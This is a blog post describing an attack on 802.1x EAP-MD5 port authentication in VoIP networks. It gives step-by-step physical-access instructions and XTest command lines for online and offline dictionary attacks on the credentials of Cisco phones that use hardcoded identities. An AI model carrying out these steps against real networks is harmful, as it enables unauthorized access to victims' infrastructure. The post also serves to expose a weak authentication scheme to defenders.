Breaking into 802.1x EAP-MD5 Port based authentication in Wired VoIP Network – II

Now that we have simulated the production network, we can proceed for the real attack. I will explain the password breaking procedure using freely available tool. Read more about setting up 802.1x Port based authentication in Wired VoIP Network here.
Sipera Viper Lab has released a new tool- XTest for automating the password breaking procedure of 802.1x EAP-MD5 port based authentication.
The tool released under GPL3 license and hosted on Tool has some cool features like –

  • 802.1x Supplicant: Test can test the username and password against an 802.1x Authenticator (Ethernet Switch), and supports re-authentication.
  • Offline pcap dictionary attack: If you capture a valid 802.1x authentication sequence into a pcap file, XTest will run a dictionary attack against the pcap using a suppliedwordlist.  XTest will elicit the password from the pcap if the dictionary file containst the valid password.
  • Shared Hub unauthorized access: Using a shared hub, XTest can use the successful authentication of a valid 802.1x supplicant to gain unauthorized access to the network.

Here are the list of steps attacker could take to get un-authorize access in Physical network.

Assumption: Attacker is already in victim premises and has access to phones lying in Lobby or reception.
1) Attacker looks at phone model and MAC address to learn username.  Unplug phone from switch port.
2) As we already know Cisco uses hardcoded username as an identity for the authentication. So for Cisco 7961G Phone the username can be CP-7961G-SEP<MacAddress>
3) Using XTest, attacker can try to get access by using learned username and random passwords.
bughira@bt:~/xtest-1.0# ./xtest -u <UserName> -p <test-Pwd>
Above command will try to complete the authentication sequence for the used username. Instead of testing passwords one by one, you can use Live Dictionary attack feature of XTest.
Just feed good collection of password dictionary to the tool and ask it to break password based on passwords from dictionary.
bughira@bt:~/xtest-1.0# ./xtest -u <UserName> -w <DictionaryFile>

4) XTest has Offline Dictionary attack feature: You can supply EAP-MD5-SUCCESS pcap file and tool will break a password for you by retrieving username and challenge from the successful authentication feature.
bughira@bt:~/xtest-1.0# ./xtest -c EAP_MD5_SUCCESS.pcap -w <Disctionary File>

5) XTest has built in 802.1x Supplicant and can be used to perform re-authentication attack as show below.

“XTest makes sure that no one can anymore completely rely on EAP-MD5 port based authentication schemes.”

Donwnload XTest here.
Happy Hunting..


About this entry